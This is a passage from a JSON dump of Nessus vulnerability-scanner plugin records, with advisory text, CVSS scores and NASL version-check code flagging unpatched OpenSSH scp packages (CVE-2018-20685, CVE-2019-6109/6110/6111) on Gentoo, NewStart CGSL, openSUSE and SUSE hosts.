or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-askpass-gnome-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-cavs-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-cavs-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-debuginfo-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-debugsource-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-fips-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-helpers-7.2p2-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"openssh-helpers-debuginfo-7.2p2-29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else 
security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-02-01T03:09:07", "description": "The remote host is affected by the vulnerability described in GLSA-201903-16\n(OpenSSH: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSH. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could overwrite arbitrary files, transfer malicious\n files, or gain unauthorized access.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 18, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-03-21T00:00:00", "title": "GLSA-201903-16 : OpenSSH: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:openssh"], "id": "GENTOO_GLSA-201903-16.NASL", "href": "https://www.tenable.com/plugins/nessus/122990", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201903-16.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122990);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/02/03\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_xref(name:\"GLSA\", value:\"201903-16\");\n\n script_name(english:\"GLSA-201903-16 : OpenSSH: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201903-16\n(OpenSSH: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSH. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could overwrite arbitrary files, transfer malicious\n files, or gain unauthorized access.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201903-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSH users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/openssh-7.9_p1-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/openssh\", unaffected:make_list(\"ge 7.9_p1-r4\"), vulnerable:make_list(\"lt 7.9_p1-r4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSH\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T12:02:31", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssh packages installed that are affected\nby 
multiple vulnerabilities:\n\n - In OpenSSH 7.9, scp.c in the scp client allows remote\n SSH servers to bypass intended access restrictions via\n the filename of . or an empty filename. The impact is\n modifying the permissions of the target directory on the\n client side. (CVE-2018-20685)\n\n - An issue was discovered in OpenSSH 7.9. Due to missing\n character encoding in the progress display, a malicious\n server (or Man-in-The-Middle attacker) can employ\n crafted object names to manipulate the client output,\n e.g., by using ANSI control codes to hide additional\n files being transferred. This affects\n refresh_progress_meter() in progressmeter.c.\n (CVE-2019-6109)\n\n - In OpenSSH 7.9, due to accepting and displaying\n arbitrary stderr output from the server, a malicious\n server (or Man-in-The-Middle attacker) can manipulate\n the client output, for example to use ANSI control codes\n to hide additional files being transferred.\n (CVE-2019-6110)\n\n - An issue was discovered in OpenSSH 7.9. Due to the scp\n implementation being derived from 1983 rcp, the server\n chooses which files/directories are sent to the client.\n However, the scp client only performs cursory validation\n of the object name returned (only directory traversal\n attacks are prevented). A malicious scp server (or Man-\n in-The-Middle attacker) can overwrite arbitrary files in\n the scp client target directory. If recursive operation\n (-r) is performed, the server can manipulate\n subdirectories as well (for example, to overwrite the\n .ssh/authorized_keys file). 
(CVE-2019-6111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 17, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : openssh Multiple Vulnerabilities (NS-SA-2019-0060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0060_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/127253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0060. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127253);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2018-20685\",\n \"CVE-2019-6109\",\n \"CVE-2019-6110\",\n \"CVE-2019-6111\"\n );\n script_bugtraq_id(106531);\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : openssh Multiple Vulnerabilities (NS-SA-2019-0060)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssh packages installed that are affected\nby multiple vulnerabilities:\n\n - In OpenSSH 7.9, scp.c in the scp client allows remote\n SSH servers to bypass intended access restrictions via\n the filename of . or an empty filename. The impact is\n modifying the permissions of the target directory on the\n client side. 
(CVE-2018-20685)\n\n - An issue was discovered in OpenSSH 7.9. Due to missing\n character encoding in the progress display, a malicious\n server (or Man-in-The-Middle attacker) can employ\n crafted object names to manipulate the client output,\n e.g., by using ANSI control codes to hide additional\n files being transferred. This affects\n refresh_progress_meter() in progressmeter.c.\n (CVE-2019-6109)\n\n - In OpenSSH 7.9, due to accepting and displaying\n arbitrary stderr output from the server, a malicious\n server (or Man-in-The-Middle attacker) can manipulate\n the client output, for example to use ANSI control codes\n to hide additional files being transferred.\n (CVE-2019-6110)\n\n - An issue was discovered in OpenSSH 7.9. Due to the scp\n implementation being derived from 1983 rcp, the server\n chooses which files/directories are sent to the client.\n However, the scp client only performs cursory validation\n of the object name returned (only directory traversal\n attacks are prevented). A malicious scp server (or Man-\n in-The-Middle attacker) can overwrite arbitrary files in\n the scp client target directory. If recursive operation\n (-r) is performed, the server can manipulate\n subdirectories as well (for example, to overwrite the\n .ssh/authorized_keys file). (CVE-2019-6111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL openssh packages. Note that updated packages may not be available yet. 
Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"openssh-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-askpass-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-cavs-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-clients-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-debuginfo-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-keycat-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-ldap-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-server-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"pam_ssh_agent_auth-0.10.3-6.1.el7.cgslv5.0.7.ga049176\"\n ],\n \"CGSL MAIN 5.04\": [\n \"openssh-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-askpass-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-cavs-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-clients-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-debuginfo-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-keycat-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-ldap-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n 
\"openssh-server-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"pam_ssh_agent_auth-0.10.3-6.1.el7.cgslv5.0.7.ga049176\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:54:30", "description": "This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. 
by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 15, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-29T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2019-91)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:openssh-debuginfo", "p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2019-91.NASL", "href": "https://www.tenable.com/plugins/nessus/121430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-91.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2019-91)\");\n script_summary(english:\"Check for the openSUSE-2019-91 patch\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-cavs-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-cavs-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-debugsource-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-fips-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-helpers-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-helpers-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-14T06:16:52", "description": "This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : openssh (SUSE-SU-2019:0126-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssh-cavs-debuginfo", "p-cpe:/a:novell:suse_linux:openssh", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:openssh-cavs", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0126-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121296", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0126-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121296);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : openssh (SUSE-SU-2019:0126-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This 
